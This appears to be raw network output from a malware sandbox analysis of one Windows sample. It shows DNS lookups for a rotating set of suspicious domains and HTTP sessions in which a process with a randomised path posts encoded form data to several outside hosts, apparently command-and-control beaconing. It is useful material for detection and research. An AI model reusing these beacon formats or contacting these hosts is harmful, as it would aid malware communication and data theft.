Dec 5, 2024 09:47:07.713274956 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:07.713304043 CET | 80 | 49764 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:07.713339090 CET | 49764 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:07.713413000 CET | 49764 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:08.304770947 CET | 49764 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:09.324244022 CET | 49765 | 80 | 192.168.2.8 | 194.58.112.174
Dec 5, 2024 09:47:09.444212914 CET | 80 | 49765 | 194.58.112.174 | 192.168.2.8
Dec 5, 2024 09:47:09.444318056 CET | 49765 | 80 | 192.168.2.8 | 194.58.112.174
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 5, 2024 09:43:25.719464064 CET | 62234 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:43:26.348073006 CET | 53 | 62234 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:43:42.806971073 CET | 49235 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:43:43.657027006 CET | 53 | 49235 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:43:58.433049917 CET | 57197 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:43:59.145210028 CET | 53 | 57197 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:44:13.385675907 CET | 57596 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:44:14.132337093 CET | 53 | 57596 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:44:28.590480089 CET | 51486 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:44:29.008097887 CET | 53 | 51486 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:44:43.418344021 CET | 63334 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:44:43.936239004 CET | 53 | 63334 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:44:58.186949968 CET | 57970 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:44:58.812783957 CET | 53 | 57970 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:45:13.530436993 CET | 60805 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:45:14.513155937 CET | 53 | 60805 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:45:28.980300903 CET | 51483 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:45:29.691615105 CET | 53 | 51483 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:45:43.933278084 CET | 59457 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:45:44.514508009 CET | 53 | 59457 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:45:58.996692896 CET | 50938 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:45:59.488550901 CET | 53 | 50938 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:46:13.732686996 CET | 52317 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:46:14.308746099 CET | 53 | 52317 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:46:28.903099060 CET | 59192 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:46:29.898646116 CET | 59192 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:46:30.031631947 CET | 53 | 59192 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:46:30.036029100 CET | 53 | 59192 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:46:44.496903896 CET | 63608 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:46:45.014050961 CET | 53 | 63608 | 1.1.1.1 | 192.168.2.8
Dec 5, 2024 09:46:59.684895039 CET | 61365 | 53 | 192.168.2.8 | 1.1.1.1
Dec 5, 2024 09:47:00.380203009 CET | 53 | 61365 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 09:43:25.719464064 CET | 192.168.2.8 | 1.1.1.1 | 0x8231 | Standard query (0) | www.bagatowcannabis.cloud | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:43:42.806971073 CET | 192.168.2.8 | 1.1.1.1 | 0x9adb | Standard query (0) | www.8600228.xyz | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:43:58.433049917 CET | 192.168.2.8 | 1.1.1.1 | 0x42d1 | Standard query (0) | www.remedies.pro | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:13.385675907 CET | 192.168.2.8 | 1.1.1.1 | 0xd5cf | Standard query (0) | www.officinadelpasso.shop | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:28.590480089 CET | 192.168.2.8 | 1.1.1.1 | 0xb2e8 | Standard query (0) | www.liveplah.live | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:43.418344021 CET | 192.168.2.8 | 1.1.1.1 | 0xd6d | Standard query (0) | www.appsolucao.shop | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:58.186949968 CET | 192.168.2.8 | 1.1.1.1 | 0xfecb | Standard query (0) | www.cg19g5.pro | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:13.530436993 CET | 192.168.2.8 | 1.1.1.1 | 0x1360 | Standard query (0) | www.kuyubak.online | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:28.980300903 CET | 192.168.2.8 | 1.1.1.1 | 0xfe10 | Standard query (0) | www.acond-22-mvr.click | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:43.933278084 CET | 192.168.2.8 | 1.1.1.1 | 0x4239 | Standard query (0) | www.vpnto.net | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:58.996692896 CET | 192.168.2.8 | 1.1.1.1 | 0x1f87 | Standard query (0) | www.avalanchefi.xyz | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:13.732686996 CET | 192.168.2.8 | 1.1.1.1 | 0xfc88 | Standard query (0) | www.amayavp.xyz | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:28.903099060 CET | 192.168.2.8 | 1.1.1.1 | 0x39df | Standard query (0) | www.beythome.online | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:29.898646116 CET | 192.168.2.8 | 1.1.1.1 | 0x39df | Standard query (0) | www.beythome.online | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:44.496903896 CET | 192.168.2.8 | 1.1.1.1 | 0x21c3 | Standard query (0) | www.d48dk.top | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:59.684895039 CET | 192.168.2.8 | 1.1.1.1 | 0x836a | Standard query (0) | www.fantastica.digital | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 09:43:26.348073006 CET | 1.1.1.1 | 192.168.2.8 | 0x8231 | No error (0) | www.bagatowcannabis.cloud | bagatowcannabis.cloud | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:43:26.348073006 CET | 1.1.1.1 | 192.168.2.8 | 0x8231 | No error (0) | bagatowcannabis.cloud | | 81.2.196.19 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:43:43.657027006 CET | 1.1.1.1 | 192.168.2.8 | 0x9adb | No error (0) | www.8600228.xyz | | 103.249.106.91 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:43:59.145210028 CET | 1.1.1.1 | 192.168.2.8 | 0x42d1 | No error (0) | www.remedies.pro | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:43:59.145210028 CET | 1.1.1.1 | 192.168.2.8 | 0x42d1 | No error (0) | www.remedies.pro | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:14.132337093 CET | 1.1.1.1 | 192.168.2.8 | 0xd5cf | No error (0) | www.officinadelpasso.shop | officinadelpasso.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:44:14.132337093 CET | 1.1.1.1 | 192.168.2.8 | 0xd5cf | No error (0) | officinadelpasso.shop | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:29.008097887 CET | 1.1.1.1 | 192.168.2.8 | 0xb2e8 | No error (0) | www.liveplah.live | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:43.936239004 CET | 1.1.1.1 | 192.168.2.8 | 0xd6d | No error (0) | www.appsolucao.shop | appsolucao.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:44:43.936239004 CET | 1.1.1.1 | 192.168.2.8 | 0xd6d | No error (0) | appsolucao.shop | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:44:58.812783957 CET | 1.1.1.1 | 192.168.2.8 | 0xfecb | No error (0) | www.cg19g5.pro | | 154.88.22.105 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:14.513155937 CET | 1.1.1.1 | 192.168.2.8 | 0x1360 | No error (0) | www.kuyubak.online | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:45:14.513155937 CET | 1.1.1.1 | 192.168.2.8 | 0x1360 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:45:14.513155937 CET | 1.1.1.1 | 192.168.2.8 | 0x1360 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:29.691615105 CET | 1.1.1.1 | 192.168.2.8 | 0xfe10 | No error (0) | www.acond-22-mvr.click | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:44.514508009 CET | 1.1.1.1 | 192.168.2.8 | 0x4239 | No error (0) | www.vpnto.net | | 91.226.30.3 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:59.488550901 CET | 1.1.1.1 | 192.168.2.8 | 0x1f87 | No error (0) | www.avalanchefi.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:45:59.488550901 CET | 1.1.1.1 | 192.168.2.8 | 0x1f87 | No error (0) | www.avalanchefi.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:14.308746099 CET | 1.1.1.1 | 192.168.2.8 | 0xfc88 | No error (0) | www.amayavp.xyz | | 185.27.134.144 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:30.031631947 CET | 1.1.1.1 | 192.168.2.8 | 0x39df | No error (0) | www.beythome.online | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:46:30.031631947 CET | 1.1.1.1 | 192.168.2.8 | 0x39df | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:46:30.031631947 CET | 1.1.1.1 | 192.168.2.8 | 0x39df | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:30.036029100 CET | 1.1.1.1 | 192.168.2.8 | 0x39df | No error (0) | www.beythome.online | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:46:30.036029100 CET | 1.1.1.1 | 192.168.2.8 | 0x39df | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:46:30.036029100 CET | 1.1.1.1 | 192.168.2.8 | 0x39df | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:46:45.014050961 CET | 1.1.1.1 | 192.168.2.8 | 0x21c3 | No error (0) | www.d48dk.top | d48dk.top | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 09:46:45.014050961 CET | 1.1.1.1 | 192.168.2.8 | 0x21c3 | No error (0) | d48dk.top | | 154.23.184.207 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 09:47:00.380203009 CET | 1.1.1.1 | 192.168.2.8 | 0x836a | No error (0) | www.fantastica.digital | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                                                                    • www.bagatowcannabis.cloud
                                                                    • www.8600228.xyz
                                                                    • www.remedies.pro
                                                                    • www.officinadelpasso.shop
                                                                    • www.liveplah.live
                                                                    • www.appsolucao.shop
                                                                    • www.cg19g5.pro
                                                                    • www.kuyubak.online
                                                                    • www.acond-22-mvr.click
                                                                    • www.vpnto.net
                                                                    • www.avalanchefi.xyz
                                                                    • www.amayavp.xyz
                                                                    • www.beythome.online
                                                                    • www.d48dk.top
                                                                    • www.fantastica.digital
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49708 | 81.2.196.19 | 80 | 5952 | C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 09:43:26.486388922 CET | 526 | OUT | GET /zzs5/?t8=erepa0aHg&dpy4vDKP=S2OsCDyvlLRi8QWYXg1pYm60P988fDuoEbyrPuxNzPrnmbTjDj97FaXU9n32cQowhVlW8PNou7nXPbuRJkerLzsl2XtEg5/IjfyZCmafOy2/D+uD8ZFJuIO6v1d/wwnCHw== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.bagatowcannabis.cloud
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Dec 5, 2024 09:43:27.768527031 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 08:43:27 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 1
Source IP: 192.168.2.8
Source Port: 49709
Destination IP: 103.249.106.91
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:43:43.860748053 CET
Bytes transferred: 774
Direction: OUT
Data:
POST /1aqh/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.8600228.xyz
Origin: http://www.8600228.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Referer: http://www.8600228.xyz/1aqh/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 58 2f 2f 50 30 58 67 54 61 34 34 6c 70 76 41 35 52 77 73 51 7a 6a 51 53 6b 4f 37 55 69 35 6e 31 36 48 4b 74 50 72 58 72 36 63 45 6d 44 66 75 59 35 42 45 76 2f 43 2f 6f 37 37 42 37 50 4e 74 45 64 72 35 47 44 78 61 65 72 55 57 4d 4d 66 6e 2f 7a 78 56 6a 69 70 45 63 70 4c 47 58 4d 42 67 31 73 78 6e 6c 45 4a 30 35 59 53 72 6c 71 4a 67 62 2f 6f 4c 49 44 72 50 51 68 6d 54 54 31 48 64 66 65 34 6e 54 42 4a 6b 61 50 56 59 34 44 64 33 38 63 66 71 7a 51 69 51 41 4e 42 69 38 46 6d 63 6d 76 37 68 54 34 38 65 6f 38 37 4c 44 4a 51 38 4c 70 46 30 58 79 42 74 37 53 6e 4d 3d
Data Ascii: dpy4vDKP=BIXlFUIVf85iX//P0XgTa44lpvA5RwsQzjQSkO7Ui5n16HKtPrXr6cEmDfuY5BEv/C/o77B7PNtEdr5GDxaerUWMMfn/zxVjipEcpLGXMBg1sxnlEJ05YSrlqJgb/oLIDrPQhmTT1Hdfe4nTBJkaPVY4Dd38cfqzQiQANBi8Fmcmv7hT48eo87LDJQ8LpF0XyBt7SnM=

Timestamp: Dec 5, 2024 09:43:45.332259893 CET
Bytes transferred: 190
Direction: IN
Data:
HTTP/1.1 400 Bad Request
Server: nginx
Date: Thu, 05 Dec 2024 08:43:45 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
Data Ascii: d404 Not Found0


Session ID: 2
Source IP: 192.168.2.8
Source Port: 49710
Destination IP: 103.249.106.91
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:43:46.595088005 CET
Bytes transferred: 794
Direction: OUT
Data:
POST /1aqh/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.8600228.xyz
Origin: http://www.8600228.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 229
Cache-Control: max-age=0
Referer: http://www.8600228.xyz/1aqh/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 57 66 50 50 34 51 55 54 53 34 34 6d 33 2f 41 35 61 51 73 55 7a 6a 63 53 6b 4d 4c 36 69 4c 7a 31 37 6d 36 74 4a 61 58 72 35 63 45 6d 58 76 75 5a 68 68 45 61 2f 43 6a 65 37 35 46 37 50 4c 42 45 64 75 39 47 44 41 61 64 70 45 57 43 45 2f 6e 39 38 52 56 6a 69 70 45 63 70 4c 69 78 4d 42 34 31 73 42 58 6c 45 6f 30 32 57 79 72 6d 67 70 67 62 30 49 4c 55 44 72 50 2b 68 6e 50 70 31 45 6c 66 65 34 58 54 42 63 51 64 46 56 59 36 48 64 32 55 59 50 76 41 58 79 5a 37 50 6a 4c 63 4d 48 41 5a 6a 74 51 35 69 65 57 75 2f 37 6a 6f 4a 54 55 39 73 79 70 2f 6f 69 39 4c 4d 77 59 58 37 51 76 76 4d 42 62 56 57 41 4b 6b 37 72 38 61 6e 70 6c 61
Data Ascii: dpy4vDKP=BIXlFUIVf85iWfPP4QUTS44m3/A5aQsUzjcSkML6iLz17m6tJaXr5cEmXvuZhhEa/Cje75F7PLBEdu9GDAadpEWCE/n98RVjipEcpLixMB41sBXlEo02Wyrmgpgb0ILUDrP+hnPp1Elfe4XTBcQdFVY6Hd2UYPvAXyZ7PjLcMHAZjtQ5ieWu/7joJTU9syp/oi9LMwYX7QvvMBbVWAKk7r8anpla

Timestamp: Dec 5, 2024 09:43:48.095791101 CET
Bytes transferred: 190
Direction: IN
Data:
HTTP/1.1 400 Bad Request
Server: nginx
Date: Thu, 05 Dec 2024 08:43:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
Data Ascii: d404 Not Found0


Session ID: 3
Source IP: 192.168.2.8
Source Port: 49711
Destination IP: 103.249.106.91
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:43:49.255536079 CET
Bytes transferred: 1811
Direction: OUT
Data:
POST /1aqh/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.8600228.xyz
Origin: http://www.8600228.xyz
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Referer: http://www.8600228.xyz/1aqh/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
Data Raw: 64 70 79 34 76 44 4b 50 3d 42 49 58 6c 46 55 49 56 66 38 35 69 57 66 50 50 34 51 55 54 53 34 34 6d 33 2f 41 35 61 51 73 55 7a 6a 63 53 6b 4d 4c 36 69 4b 4c 31 36 55 79 74 50 4a 2f 72 34 63 45 6d 55 76 75 63 68 68 45 48 2f 43 71 58 37 35 4a 72 50 4f 64 45 48 4d 31 47 46 79 69 64 6a 45 57 43 49 66 6e 2b 7a 78 56 32 69 70 56 62 70 4c 79 78 4d 42 34 31 73 44 2f 6c 44 35 30 32 55 79 72 6c 71 4a 67 50 2f 6f 4c 6f 44 72 48 49 68 6e 4b 4c 31 31 46 66 65 63 7a 54 44 75 34 64 4e 56 59 38 4b 39 32 4d 59 4f 54 66 58 79 55 56 50 6d 65 4c 4d 47 30 5a 6e 4c 46 35 2b 65 53 78 69 5a 2f 48 46 68 73 64 6f 51 64 49 6f 77 70 76 47 53 6b 78 37 56 37 6b 62 42 72 5a 62 67 6a 2f 70 39 73 7a 76 2b 73 6b 54 34 76 6a 71 55 65 34 4a 6f 57 72 6f 76 48 35 53 70 4f 31 45 6b 41 47 30 35 50 47 6c 71 56 6a 64 38 4d 45 56 64 6a 57 76 5a 71 68 54 5a 2f 78 69 51 50 34 34 6a 47 66 30 70 47 6a 33 61 6f 31 4b 66 48 54 37 77 45 72 56 45 4c 39 51 63 4b 6d 6a 62 6a 63 4f 63 49 78 63 65 32 41 76 73 32 57 32 70 52 79 6c 58 49 37 55 66 34 73 52 [TRUNCATED]
Data Ascii: dpy4vDKP=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 [TRUNCATED]


Session ID: 4
Source IP: 192.168.2.8
Source Port: 49712
Destination IP: 103.249.106.91
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:43:51.906380892 CET
Bytes transferred: 516
Direction: OUT
Data:
GET /1aqh/?dpy4vDKP=MK/FGhogQMFGTubZtl0nY6hc/pJIZCUp1R0gjdvUtYSP9EvSbL3Gx6E3faPb4gMH2ieWspJSGv1JG+kjFz+FowS8MPOB8ARjyMg7sZyMJw5GniWcBKwlZHjyk+h59baaXg==&t8=erepa0aHg HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.8600228.xyz
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)

Timestamp: Dec 5, 2024 09:43:53.418690920 CET
Bytes transferred: 528
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 Dec 2024 08:43:53 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Data Raw: 31 34 38 0d 0a 3c 62 72 3e 0d 0a 3c 62 72 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 22 3e e5 8a a0 e8 bd bd e4 b8 ad ef bc 8c e8 af b7 e7 a8 8d e5 90 8e 2e 2e 2e 2e 2e 2e 3c 2f 70 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 2c 63 6b 3a 22 4a 58 4f 79 43 6d 38 6f 64 56 58 78 68 42 32 77 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 66 79 65 72 2e 63 6f 6d 3f 69 64 3d 38 34 35 36 32 22 20 2f 3e 0d 0a 30 0d 0a [TRUNCATED]
Data Ascii: 148<br><br><center><p style="font-size: 20px;">......</p></center><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"JXOyCm8odVXxhB2w",ck:"JXOyCm8odVXxhB2w"})</script><meta http-equiv="refresh" content="1;url=https://www.bfyer.com?id=84562" />0


Session ID: 5
Source IP: 192.168.2.8
Source Port: 49714
Destination IP: 13.248.169.48
Destination Port: 80
PID: 5952
Process: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe

Timestamp: Dec 5, 2024 09:43:59.283620119 CET
Bytes transferred: 777
Direction: OUT
Data:
POST /p9ni/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.remedies.pro
Origin: http://www.remedies.pro
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Referer: http://www.remedies.pro/p9ni/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
